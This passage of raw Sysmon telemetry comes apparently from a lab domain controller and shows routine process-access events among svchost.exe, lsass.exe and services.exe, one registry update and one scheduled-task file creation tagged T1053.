15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.925{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.910{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.894{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.894{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.894{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.863{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.863{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.863{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.863{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.863{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.863{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.847{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.847{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.847{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.847{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.847{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1100-000000008801}1204C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:00.847{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{B2978737-BDE4-4A30-BBC3-C53431E535DB}\DateLastConnectedBinary Data 11241100x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT10532020-11-03 15:51:00.847{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 